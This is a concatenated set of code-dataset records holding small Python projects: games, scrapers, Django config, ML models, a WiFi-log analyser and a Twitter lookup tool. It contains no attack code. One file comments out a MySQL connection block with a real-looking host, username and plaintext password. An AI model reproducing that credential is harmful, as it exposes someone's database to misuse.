(rx, cx)\n\n def status(self):\n \"\"\"\n Returns the status of the game.\n\n The status consists of two values: a Boolean indicating if the\n game is considered over, due to either a tie or a win, and a\n string containing the winner (if there is no tie).\n \"\"\"\n over = False\n winner = None\n board = self.board\n symbols = ([self.sym_user] * board.size(),\n [self.sym_cpu] * board.size())\n\n # check each row for a win\n for rx in range(board.size()):\n if board.row(rx) in symbols:\n over = True\n winner = board.symbol(rx, 0)\n break\n\n # check each column for a win\n if not over:\n for cx in range(board.size()):\n if board.col(cx) in symbols:\n over = True\n winner = board.symbol(0, cx)\n break\n\n # check diagonals for a win\n if not over:\n if (board.diagonal('<') in symbols) or (board.diagonal('>') in symbols):\n over = True\n mid_row, mid_col = board.midpoint()\n winner = board.symbol(mid_row, mid_col)\n\n # check for a tie\n if not over:\n over = board.num_blanks() == 0\n\n return over, winner\n\n def is_over(self):\n \"\"\" Shortcut method to determine if the game is over. 
\"\"\"\n if None in (self.board, self.sym_user, self.sym_cpu):\n return True\n\n over, winner = self.status()\n return over\n\nclass Application:\n def __init__(self, parent):\n self.bsize = 3\n self.syms = ('X', 'O')\n self.game = Game()\n\n # main frame: TicTacToe button board\n # contains sub-frames for each row of buttons\n\n self.frame1 = tk.Frame(parent)\n self.buttons = [[None for cx in range(self.bsize)] \\\n for rx in range(self.bsize)]\n\n for rx in range(self.bsize):\n row_frame = tk.Frame(self.frame1)\n for cx in range(self.bsize):\n btn = tk.Button(row_frame, text='')\n btn['command'] = lambda rx=rx, cx=cx: self.button_click(rx, cx)\n btn['width'] = 12\n btn['height'] = btn['width'] // 2\n btn['disabledforeground'] = btn['fg']\n btn['state'] = tk.DISABLED\n btn.pack()\n self.buttons[rx][cx] = btn\n row_frame.pack(side='left')\n\n self.frame2 = tk.Frame(parent)\n self.frame2_button1 = tk.Button(self.frame2, text=\"New Game\", command=self.new_game)\n self.frame2_button1.pack(side=tk.LEFT)\n self.frame2.pack()\n\n self.frame3 = tk.Frame(parent)\n self.status = tk.StringVar()\n self.frame3_label1 = tk.Label(parent, textvariable=self.status)\n self.frame3_label1.pack(side='bottom')\n self.frame3.pack()\n self.frame1.pack()\n\n self.set_status(\"Click [New Game] to begin.\")\n\n def new_game(self):\n game = self.game\n\n if not game.is_over() and not msgbox.askyesno(\"Warning!\", \"The game isn't over yet.\\nDo you want to abandon this game and start another?\"):\n return\n\n self.game.new(self.bsize, self.syms)\n\n size = game.board.size()\n for rx in range(size):\n for cx in range(size):\n btn = self.buttons[rx][cx]\n btn['text'] = ''\n btn['state'] = tk.NORMAL\n btn['cursor'] = 'hand1'\n\n self.set_status(\"Select a move.\")\n\n def set_status(self, fmt, *args):\n self.status.set(fmt.format(*args))\n\n def mark_button(self, rx, cx):\n btn = self.buttons[rx][cx]\n btn[\"text\"] = self.game.board.symbol(rx, cx)\n btn[\"state\"] = tk.DISABLED\n btn['cursor'] = 'arrow'\n\n def button_click(self, row_index, col_index):\n game = self.game\n\n if game.move_user(row_index, col_index):\n #print(game.board)\n self.mark_button(row_index, col_index)\n\n over, winner = game.status()\n\n if not over:\n cpu_rx, cpu_cx = game.move_computer()\n #print(game.board)\n over, winner = game.status()\n\n if cpu_rx < 0:\n cpu_rx += game.board.size()\n if cpu_cx < 0:\n cpu_cx += game.board.size()\n\n self.set_status(\"You played {},{}; CPU played {},{}\", row_index,\n col_index, cpu_rx, cpu_cx)\n\n self.mark_button(cpu_rx, cpu_cx)\n\n if over:\n if winner is None:\n self.set_status(\"Game ended in a tie.\")\n elif winner == game.sym_user:\n self.set_status(\"You won!\")\n elif winner == game.sym_cpu:\n self.set_status(\"You lost.\")\n else:\n msgbox.showerror('TicTacToe', 'Invalid move.')\n\nroot = tk.Tk()\napp = Application(root)\nroot.mainloop()\n","sub_path":"lab10/tic_tac_toe_enhanced_v1.py","file_name":"tic_tac_toe_enhanced_v1.py","file_ext":"py","file_size_in_byte":13417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"27496707","text":"#!/usr/bin/env python\n# Name: David van Schie\n# Student number: 10800999\n\"\"\"\nThis script scrapes IMDB and outputs a CSV file with highest rated tv series.\n\"\"\"\n\nimport sys\nimport csv\nimport requests\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\n\nTARGET_URL = 
\"http://www.imdb.com/search/title?num_votes=5000,&sort=user_rating,desc&start=1&title_type=tv_series\"\nBACKUP_HTML = 'tvseries.html'\nOUTPUT_CSV = 'tvseries.csv'\n\n \ndef extract_tvseries(dom):\n \"\"\"\n Extract a list of highest rated TV series from DOM (of IMDB page).\n Each TV series entry should contain the following fields:\n - TV Title\n - Rating\n - Genres (comma separated if more than one)\n - Actors/actresses (comma separated if more than one)\n - Runtime (only a number!)\n \"\"\"\n\n rget = requests.get(TARGET_URL)\n soup = BeautifulSoup(rget.text, \"html.parser\")\n\n # all tv show info can be found in div classes called 'lister-item mode-advanced'\n allshows = soup.find_all('div', class_ = 'lister-item mode-advanced')\n\n title = []\n rating = []\n runtime = []\n genre = []\n actor = []\n\n # find and extract tv show info \n for show in allshows:\n title.append(show.h3.a.text)\n rating.append(show.strong.text)\n runtime.append(show.find('span', class_='runtime').text.strip(\" min\"))\n genre.append(show.find('span', class_ = 'genre').text.split())\n searchactor = show.find_all('p')[2].find_all('a')\n serie_actors = []\n for i in searchactor:\n serie_actors.append(i.text)\n actor.append(serie_actors)\n\n tvshows = {'Title': title, 'Rating': rating, 'Runtime': runtime, 'Genre' : genre, 'Actors': actor}\n\n return tvshows\n\ndef save_csv(outfile, tvseries):\n\n # necessary for writing unicode\n reload(sys)\n sys.setdefaultencoding('utf8')\n\n title = tvseries['Title']\n rating = tvseries['Rating']\n runtime = tvseries['Runtime']\n genre = tvseries['Genre']\n actor = tvseries['Actors']\n\n writer = csv.writer(outfile) \n writer.writerow(['Title', 'Rating', 'Genre', 'Runtime', 'Actors'])\n\n # write every tv show to a row\n for i in range(50):\n writer.writerow((title[i], rating[i], ''.join(map(str, genre[i])), runtime[i], ','.join(actor[i])))\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n except RequestException as e:\n print('The following error occurred during HTTP GET request to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns true if the response seems to be HTML, false otherwise\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\nif __name__ == \"__main__\":\n\n # get HTML content at target URL\n html = simple_get(TARGET_URL)\n\n # save a copy to disk in the current directory, this serves as an backup\n # of the original HTML, will be used in grading.\n with open(BACKUP_HTML, 'wb') as f:\n f.write(html)\n\n # parse the HTML file into a DOM representation\n dom = BeautifulSoup(html, 'html.parser')\n\n # extract the tv series (using the function you implemented)\n tvseries = extract_tvseries(dom)\n\n # write the CSV file to disk (including a header)\n with open(OUTPUT_CSV, 'w',) as output_file:\n save_csv(output_file, tvseries)\n ","sub_path":"Homework/Week_1/Scraping/tvscraper.py","file_name":"tvscraper.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} 
+{"seq_id":"32220961","text":"#################################################################################\n\nimport math\n\n\naction = int(input(\"\"\"What do you want to do with numbers\n1. Addition\n2. Subtraction\n3. Multiplication\n4. Division\nInput, please: \"\"\"))\n\n\ndef addition():\n list_with_numbers = []\n amount_of_numbber = int(input(\"How much numbers do you want to add: \"))\n for x in range(amount_of_numbber):\n users_numbers = int(input(\"Enter value: \"))\n list_with_numbers.append(users_numbers) \n print(\"Sum of this numbers is\", sum(list_with_numbers))\n\ndef subtraction():\n first_value = int(input(\"First value: \"))\n second_value = int(input(\"Second value: \"))\n print(\"Subtraction result of this numbers is\", first_value - second_value)\n\n\ndef multiplication():\n list_with_numbers = []\n amount_of_numbber = int(input(\"How much numbers do you want to multiply: \"))\n for x in range(amount_of_numbber):\n users_numbers = int(input(\"Enter value: \"))\n list_with_numbers.append(users_numbers) \n print(\"Result of multiplication of this numbers is\", math.prod(list_with_numbers))\n\ndef division():\n first_value = int(input(\"First value: \"))\n second_value = int(input(\"Second value: \"))\n print(\"Division result of this numbers is\", first_value / second_value)\n\nif action == 1:\n addition()\nif action == 2:\n subtraction()\nif action == 3:\n multiplication()\nif action == 4:\n division()\n\n#################################################################################\n\nimport random\n\nrandom_value = random.randint(1,100)\nuser_value = int(input(\"Your value?: \"))\n\nwhile user_value != random_value:\n if user_value > random_value:\n user_value = (int(input(\"Go down: \")))\n continue\n elif user_value < random_value:\n user_value = (int(input(\"Try bigger: \")))\n continue\n \nif user_value == random_value:\n print(\"You win\") \n\n\n#################################################################################","sub_path":"classwork07_04.py","file_name":"classwork07_04.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"168828506","text":"\"\"\"JavaDispatch URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url,include\nfrom django.views.generic import RedirectView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n #login\n url(r'^$',RedirectView.as_view(url='/account/login')),\n \n #account\n url(r'^account/',include(\"account.urls\")),\n \n #server\n url(r'^server/',include(\"server.urls\")),\n \n #application\n url(r'^application/',include(\"application.urls\")),\n \n #deployconfig\n url(r'^deployConfig/',include(\"DeployConfig.urls\")),\n\n #jdfile\n url(r'^jdfile/',include(\"jdfile.urls\")),\n #task\n url(r'^task/',include(\"task.urls\")),\n]\n","sub_path":"JavaDispatch/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"263809007","text":"#!/usr/bin/env python\n#coding=utf-8\n\nimport sys\nimport json\nimport os\nfrom itertools import combinations\n\nfrom mrjob.job import MRJob\nfrom mrjob.protocol import RawValueProtocol\nfrom pyutil.springdb import SpringDBClient\n\n#INPUT_FILE = os.environ.get('mapreduce_map_input_file','none')\nclass MRGetFriend(MRJob):\n key_tmpl = \"aweme_user_friend_%s\"\n def mapper(self, _, line):\n try:\n lst = line.split(\"\\t\")\n uid, ttype = lst[0].strip('\"').split('_')\n if ttype != \"friend\":\n return\n friend_list = json.loads(lst[1])\n if uid and friend_list:\n yield uid, friend_list\n\n except Exception as err:\n print >>sys.stderr, str(err)\n\n def reducer_init(self):\n SpringDBClient.set_zone(\"online\")\n self._springdb = SpringDBClient(\"springdb_essay_profile\", \"aweme_user_relation\", socket_timeout=5)\n self.expire_time = 86400 * 10\n\n def reducer(self, uid, values):\n pipe = self._springdb.pipeline()\n friend_list = list()\n for v in values:\n friend_list = v\n info = json.dumps(friend_list)\n key = self.key_tmpl % uid\n pipe.setex(key, info, self.expire_time)\n pipe.execute()\n\nif __name__ == '__main__':\n MRGetFriend.run()\n","sub_path":"essay_pipeline/user_relation_mining/get_friend_mr.py","file_name":"get_friend_mr.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"417033931","text":"from django.contrib import admin\nfrom games.models import Game,Score, Cheat\n\nclass GameAdmin(admin.ModelAdmin):\n\tclass ChoiceInline(admin.TabularInline):\n\t\tmodel = Score\n\t\textra = 0\n\n\tfields= (('name','price'), 'doge_address',)\n\tlist_display = ('name','doge_address','price','get_account_balance',)\n\tlist_editable = ('price',)\n\tinlines= [ChoiceInline]\n\nclass CheatAdmin(admin.ModelAdmin):\n\tsearch_fields = ('user__username',)\n\tfields = (('user','game'), ('reason','value'), 'log',)\n\tdate_hierarchy = 'date'\n\tlist_display = ('user','game','reason','value','date')\n\nadmin.site.register(Game,GameAdmin)\nadmin.site.register(Cheat,CheatAdmin)","sub_path":"games/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"42739864","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef conv(bottom, filt_name, filt_shape):\n filt = tf.Variable(initial_value=tf.truncated_normal(shape=filt_shape, stddev=0.01), name=filt_name)\n bias = tf.Variable(initial_value=tf.truncated_normal(shape=[filt_shape[3], ], stddev=0.001),\n 
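# --- Added note (not part of the original convNet.py): the 7*7*64 flatten
# size used in net() comes from two 2x2, stride-2 max-pools applied to a
# 28x28 input with 'SAME' padding: 28 -> 14 -> 7, with 64 channels after
# conv_3.  A quick pure-Python sanity check of that arithmetic:
h = w = 28
for _ in range(2):                 # pool1, pool2
    h, w = (h + 1) // 2, (w + 1) // 2
assert (h, w) == (7, 7) and h * w * 64 == 3136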
name=filt_name + \"bias\")\n layer = tf.nn.conv2d(bottom, filt, strides=[1, 1, 1, 1], padding=\"SAME\") + bias\n return tf.nn.relu(layer)\n\n\ndef max_pool(bottom, name):\n return tf.nn.max_pool(bottom, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name=name)\n\n\ndef f_c(bottom, w_name, w_shape,activation_func=True):\n w_fc = tf.Variable(tf.truncated_normal(w_shape, stddev=0.1), name=w_name)\n bias_fc = tf.Variable(tf.constant(0.1, shape=[w_shape[1], ]), name=w_name + \"bias\")\n if activation_func:\n return tf.nn.relu(tf.matmul(bottom, w_fc) + bias_fc)\n else:\n return tf.matmul(bottom, w_fc) + bias_fc\n\n\ndef net(input_image, keep_prob):\n \n input_image = tf.reshape(input_image, [-1, 28, 28, 1])\n\n conv_5x5_in = conv(input_image, \"conv_5x5_in\", [5, 5, 1, 64])\n\n conv_2 = conv(conv_5x5_in, \"conv_2\", [3, 3, 64, 64])\n pool1 = max_pool(conv_2, 'pool1')\n\n conv_3 = conv(pool1, \"conv_3\", [3, 3, 64, 64])\n pool2 = max_pool(conv_3, 'pool2')\n\n pool2_flat = tf.reshape(pool2, [-1, 7*7*64])\n\n fc1 = f_c(pool2_flat, w_name=\"fc_1\", w_shape=[7 * 7 * 64, 1024])\n h_fc1_drop = tf.nn.dropout(fc1, keep_prob)\n\n fc2 = f_c(h_fc1_drop, w_name=\"fc_2\", w_shape=[1024, 10],activation_func=False)\n\n prediction = tf.argmax(fc2,1)\n \n return prediction\n","sub_path":"src/convNet.py","file_name":"convNet.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"233333225","text":"import sys\nfrom os.path import dirname, realpath\n\nsys.path.append(realpath(dirname(__file__)))\nfrom gimpfu import main\nfrom _plugin_base import GimpPluginBase\n\n\nclass Colorize(GimpPluginBase):\n def run(self):\n self.model_file = 'NeuralColorization.py'\n result = self.predict(self.drawable)\n self.create_image(result)\n\n\nplugin = Colorize()\nplugin.register(\n proc_name=\"colorize\",\n blurb=\"colorize\",\n help=\"Colorize grayscale images\",\n author=\"Kritik Soman\",\n copyright=\"\",\n date=\"2020\",\n label=\"colorize...\",\n imagetypes=\"GRAY*\"\n)\nmain()\n","sub_path":"plugins/colorize.py","file_name":"colorize.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"14057663","text":"'''\nCreated on Aug 10, 2020\n\n@author: haruka\n'''\nimport os\nimport csv\nimport time\nimport pprint\nimport pandas as pd\nimport numpy as np\nimport mysql.connector\n\nclass Wifilogcsv02_lib :\n\n def __init__(self, filepath):\n self.filepath = filepath\n self.csv_tfile = \"\"\n self.file_tlist = []\n self.csv_dfile = \"\"\n self.file_dlist = []\n self.duration_all = 0\n self.APlocations = []\n self.transition_all =[]\n self.transition_rate = []\n self.transitions_gall = []\n self.transition_grate = []\n # コネクションの作成\n #dbh = mysql.connector.connect(\n # host='cloud02.mizunolab.info',\n ## port='3306',\n # db='mznwifilog',\n # user='mznwifilog',\n # password='kansoukikashiteyo',\n # charset='utf8'\n #)\n #print(dbh.is_connected())\n #self.cur = dbh.cursor()\n\n def get_APlocations(self,csv_name):\n self.APlocations = pd.read_csv(csv_name, engine='python')\n\n def get_csv_tfile(self, csv_tfile):\n self.csv_tfile = csv_tfile\n self.file_tlist = []\n for file in os.listdir(self.filepath):\n is_tfile = 'transition' in file #transitionファイルか?\n not_csv_file = self.csv_tfile != file# リストCSVファイルでないか\n if is_tfile and not_csv_file:\n self.file_tlist.append(file)\n #print(self.file_tlist)\n\n for i in range(len(self.file_tlist)):\n if 
 i == 0:\n                self.transition_all = pd.read_csv(self.filepath+'/'+self.file_tlist[i], engine='python', index_col=0)\n            else:\n                self.transition_all += pd.read_csv(self.filepath+'/'+self.file_tlist[i], engine='python', index_col=0)\n        #print(self.transition_all)\n        self.transition_all.to_csv(self.filepath+'/'+self.csv_tfile)\n        return self.transition_all\n\n    def get_rate_tfile(self, transition_all):\n        self.transition_rate = transition_all\n        tsum = transition_all.sum(axis=1) # per-row totals (non-numeric data ignored)\n        #print(tsum)\n        for c in self.transition_rate.columns:\n            self.transition_rate[c] = self.transition_rate[c]/tsum\n        transition_rate = self.transition_rate.fillna(0)\n        #print(transition_rate)\n        transition_rate.to_csv(self.filepath+'/trate.csv')\n        return transition_rate\n\n    def get_rate_tfile2(self, transition_all):\n        self.transition_rate = transition_all\n        tsum = transition_all.sum(axis=1) # per-row totals (non-numeric data ignored)\n        dlist = list(tsum[tsum == 0].index)\n        #print(dlist)\n        self.transition_rate = self.transition_rate.drop(dlist)\n        self.transition_rate = self.transition_rate.drop(self.transition_rate.columns[dlist], axis=1)\n        #print(transition_rate)\n        self.transition_rate.to_csv(self.filepath+'/markov_rate.csv')\n        self.APlocations.drop(dlist).to_csv(self.filepath+'/markov_AP.csv')\n\n        #for column_name, item in transition_rate.iteritems():\n            #print(column_name)\n            #for column_name2, item2 in item.iteritems():\n                #print(column_name2, item2)\n        return self.transition_rate\n\n    def get_csv_tfile_group(self, csv_tfile):\n        APid = self.APlocations['AP'].str.split('Bldg', expand=True)[1].str.split('AP', expand=True)[0].str.split('_', expand=True)[0]\n        print(self.filepath+'/'+csv_tfile)\n        with open(self.filepath+'/'+csv_tfile) as f:\n            reader = csv.reader(f)\n            l = [row for row in reader]\n        tall = [[int(v) for v in row[1:]] for row in l[1:]]\n        gtall = [[0] * 49 for i in range(49)] # +1 for the 'outside' state\n        #print(gtall)\n        for i, iname in enumerate(APid):\n            #print(i, iname)\n            for j, jname in enumerate(APid):\n                #print(j, jname)\n                gtall[int(iname)-1][int(jname)-1] = gtall[int(iname)-1][int(jname)-1] + tall[i][j]\n            gtall[int(iname)-1][48] = gtall[int(iname)-1][48] + tall[i][-1] # 'outside' column\n        for i, iname in enumerate(APid):\n            #print(i, iname)\n            gtall[48][int(iname)-1] = gtall[48][int(iname)-1] + tall[-1][i]\n        gtall[48][48] = gtall[48][48] + tall[-1][-1] # outside -> outside\n        #print(gtall[48])\n        self.transitions_gall = pd.DataFrame(gtall,index=[i for i in range(len(gtall))],columns=[i for i in range(len(gtall))])\n        self.transitions_gall.to_csv(self.filepath+'/gtransitions_all.csv')\n\n        return self.transitions_gall\n\n\n    def get_rate_tfile_group(self, transition_gall):\n        self.transition_grate = transition_gall\n        tsum = transition_gall.sum(axis=1) # per-row totals (non-numeric data ignored)\n        #print(tsum)\n        for c in self.transition_grate.columns:\n            self.transition_grate[c] = self.transition_grate[c]/tsum\n        transition_grate = self.transition_grate.fillna(0)\n        #print(transition_grate)\n        transition_grate.to_csv(self.filepath+'/gtrate.csv')\n        return transition_grate\n\n    def get_rate_tfile2_group(self, transition_gall):\n        self.transition_grate = transition_gall\n        tsum = transition_gall.sum(axis=1) # per-row totals (non-numeric data ignored)\n        dlist = list(tsum[tsum == 0].index)\n        #print(dlist)\n        self.transition_grate = self.transition_grate.drop(dlist)\n        self.transition_grate = self.transition_grate.drop(self.transition_grate.columns[dlist], axis=1)\n        #print(transition_grate)\n        self.transition_grate.to_csv(self.filepath+'/markov_grate.csv')\n        self.APlocations.drop(dlist).to_csv(self.filepath+'/markov_gAP.csv')\n        return
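# --- Added sketch (an alternative, not the module's own method): the nested
# loops in get_csv_tfile_group above fold the AP-level transition matrix into
# building groups.  The same fold can be written with a pandas groupby applied
# to both axes; the data here is a toy 3x3 matrix with a made-up AP->building
# mapping.
import pandas as pd

t = pd.DataFrame([[1, 2, 0], [0, 3, 1], [4, 0, 2]])  # toy AP x AP counts
groups = pd.Series([0, 0, 1])                        # APs 0,1 -> bldg 0; AP 2 -> bldg 1
g = t.groupby(groups).sum().T.groupby(groups).sum().T
print(g)  # 2x2 building-level transition counts: [[6, 1], [4, 2]]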
        return self.transition_grate\n\n    def get_csv_dfile(self, csv_dfile):\n        self.csv_dfile = csv_dfile\n        self.file_dlist = []\n        for file in os.listdir(self.filepath):\n            is_tfile = 'duration' in file  # is this a duration file?\n            not_csv_file = self.csv_dfile != file  # and not the aggregated list CSV itself\n            if is_tfile and not_csv_file:\n                self.file_dlist.append(file)\n        #print(self.file_dlist)\n\n        for i in range(len(self.file_dlist)):\n            if i == 0:\n                pd.read_csv(self.filepath+'/'+self.file_dlist[i], engine='python').to_csv(self.filepath+'/'+self.csv_dfile, columns=['duration','from','to'], index=False)\n            else:\n                pd.read_csv(self.filepath+'/'+self.file_dlist[i], engine='python').to_csv(self.filepath+'/'+self.csv_dfile, header=False, columns=['duration','from','to'], index=False, mode=\"a\")\n\n        self.duration_all = pd.read_csv(self.filepath+'/'+self.csv_dfile, engine='python')\n        #print(self.duration_all)\n        return self.duration_all\n\n    def get_meantime(self):\n        meantime = [-1 for i in range(len(self.APlocations))]\n        for i in range(len(self.APlocations)):\n            dlist = self.duration_all[(self.duration_all['from'] == i) & (self.duration_all['duration'] != -1)]\n            if dlist['duration'].count() > 0:\n                meantime[i] = dlist['duration'].sum() / dlist['duration'].count()\n        with open(self.filepath+'/meantime.csv', 'w') as f:\n            writer = csv.writer(f)\n            writer.writerow(meantime)\n        return meantime\n\n\n    def get_meantime2(self):\n        meantime = [-1 for i in range(len(self.APlocations))]\n        for i in range(len(self.APlocations)):\n            dlist = self.duration_all[(self.duration_all['from'] == i) & (self.duration_all['duration'] != -1) & (self.duration_all['duration'] <= 3600*3)]\n            if dlist['duration'].count() > 0:\n                meantime[i] = dlist['duration'].sum() / dlist['duration'].count()\n        with open(self.filepath+'/meantime2.csv', 'w') as f:\n            writer = csv.writer(f)\n            writer.writerow(meantime)\n        return meantime","sub_path":"Wifilogcsv02_lib.py","file_name":"Wifilogcsv02_lib.py","file_ext":"py","file_size_in_byte":7930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"199470517","text":"import os\nimport sys\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom celery.signals import worker_process_init\nfrom sqlalchemy import event\nfrom sqlalchemy import exc\nfrom models import Base\n\nif sys.version_info < (3, 0):\n    import ConfigParser\n    config = ConfigParser.ConfigParser()\nelse:\n    import configparser\n    config = configparser.ConfigParser()\n\n\nconfig_path = './{}/config.ini'.format(__name__)\nconfig_dev_path = './{}/config_dev.ini'.format(__name__)\n\n# read config.ini if present, otherwise fall back to config_dev.ini\nif os.path.exists(config_path):\n    config.read(config_path)\nelse:\n    config.read(config_dev_path)\n\n\ndef create_new_engine():\n    engine = create_engine(\n        config.get('database', 'database_url'),\n        echo=config.getboolean('database', 'test') or False\n    )\n\n    return engine\n\nengine = create_new_engine()\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n#Base.metadata.create_all(engine)\n\n\n'''Why use a dict to save the engine and session?\nBecause with multiprocessing, each new process must create its own connection to the database. 
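A rough sketch of the pattern used below (names as defined in this module): every worker rebuilds its own engine and session on startup, e.g. engine = create_new_engine(); session = sessionmaker(bind=engine)(), and publishes both through the shared sqla dict so the rest of the code picks up the fresh handles.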
\nAt first I followed\nhttp://docs.sqlalchemy.org/en/latest/core/pooling.html#using-connection-pools-with-multiprocessing\nand used the approaches described there, but errors kept appearing whenever a new process started.\n'''\nsqla = {\n    'engine': engine,\n    'session': session\n}\n\n@worker_process_init.connect\ndef new_process(signal, sender):\n    engine = create_new_engine()\n    Session = sessionmaker(bind=engine)\n    session = Session()\n\n    sqla['engine'] = engine\n    sqla['session'] = session\n","sub_path":"config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"39751372","text":"import multiprocessing as mp\n\n\ndef cube(x):\n    return x ** 3\n\n\n# Pool.map and Pool.apply block the main program until all processes are finished,\n# which is useful when results must be obtained in a particular order.\npool = mp.Pool(processes=4)\nresults = [pool.apply(cube, args=(x,)) for x in range(1, 7)]\nprint(results)\n\npool = mp.Pool(processes=4)\nresults = pool.map(cube, range(1, 7))\nprint(results)\n\n# The async variants submit all processes at once\n# and retrieve the results as soon as they are finished.\npool = mp.Pool(processes=4)\nresults = [pool.apply_async(cube, args=(x,)) for x in range(1, 7)]\noutput = [p.get() for p in results]\nprint(output)","sub_path":"threads/poolExample.py","file_name":"poolExample.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"317273956","text":"import time\nfrom core import Conv2d3dCore\nimport argparse\nfrom config import getConfig\n\nargParser = argparse.ArgumentParser()\nargParser.add_argument('--i', dest='input_file', default='/home/zhaohoj/Videos/龙门客栈00-05-00.mp4')\nargParser.add_argument('--o', dest='output_file', default='/home/zhaohoj/Videos/xx.mp4')\nargs = argParser.parse_args()\n\nif __name__ == '__main__':\n    t0 = time.time()\n    config = getConfig(args)\n    core = Conv2d3dCore(config)\n    core.wait()\n    t1 = time.time()\n    print('All Done!')\n    print(f'Total time used: {t1 - t0}')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"551677841","text":"'''\n    Module for looking up Twitter users and tweets using Tweepy.\n'''\nfrom collections import namedtuple\nimport tweepy\n\nfrom twitterlookup import config\n\nclass Result(namedtuple('Result', ['twid', 'value'])):\n    ''' namedtuple extended to have a different __str__ '''\n    __slots__ = ()\n    def __str__(self):\n        return '{} -> {}'.format(self.twid, self.value)\n\nclass TwitterLookup(object):\n    '''\n    Lookup Twitter users and tweets using Tweepy.\n\n    Expects a config file in ~/.twitterlookup for authenticating to Twitter's API.\n    '''\n    def __init__(self):\n        self.config = config.load_config()\n        auth = tweepy.OAuthHandler(self.config['credentials']['consumer_key'],\n                                   self.config['credentials']['consumer_secret'])\n        auth.set_access_token(self.config['credentials']['access_token'],\n                              self.config['credentials']['access_token_secret'])\n\n        self.api = tweepy.API(auth)\n\n    def get_user(self, request):\n        \"\"\" Get the user with the given screen name or id \"\"\"\n        try:\n            result = self.api.get_user(id=request)\n        except tweepy.TweepError as error:\n            if error.api_code == 50:\n                return False\n            else:\n                raise\n\n        return Result(result.id_str, 
result.screen_name)\n\n def get_tweet(self, tweet_id):\n \"\"\" Get tweet text by id \"\"\"\n try:\n result = self.api.get_status(tweet_id)\n except tweepy.TweepError as error:\n if error.api_code == 144:\n return False\n else:\n raise\n\n return Result(result.user.screen_name, result.text)\n","sub_path":"twitterlookup/lookup.py","file_name":"lookup.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"643886055","text":"import os\nimport sys\n\nwhereIam = os.uname()[1]\nassert whereIam in [\n \"wdtim719z\",\n \"calculon\",\n \"astroboy\",\n \"flexo\",\n \"bender\",\n \"ldtis706z\",\n]\n\nif whereIam == \"wdtim719z\":\n root = \"/data/\"\nif whereIam == \"ldtis706z\":\n root = \"/media/achanhon/bigdata/data/\"\nif whereIam in [\"calculon\", \"astroboy\", \"flexo\", \"bender\"]:\n root = \"/scratchf/\"\n\nif not os.path.exists(root + \"CIA\"):\n print(\"cia not found\")\n quit()\n\nos.system(\"rm -rf build\")\nos.makedirs(\"build\")\n\nif whereIam == \"wdtim719z\":\n os.system(\"/data/anaconda3/envs/pytorch/bin/python train.py\")\n os.system(\"/data/anaconda3/envs/pytorch/bin/python test.py\")\nif whereIam == \"ldtis706z\":\n os.system(\"python3 train.py\")\n os.system(\"python3 test.py\")\nif whereIam in [\"calculon\", \"astroboy\", \"flexo\", \"bender\"]:\n os.system(\"/d/jcastillo/anaconda3/bin/python train.py\")\n os.system(\"/d/jcastillo/anaconda3/bin/python test.py\")\n","sub_path":"segblock/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"303021094","text":"import os\nimport shutil\nimport cv2\nimport argparse\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom face_recognition import face_locations, face_encodings\n\nbgr_red = 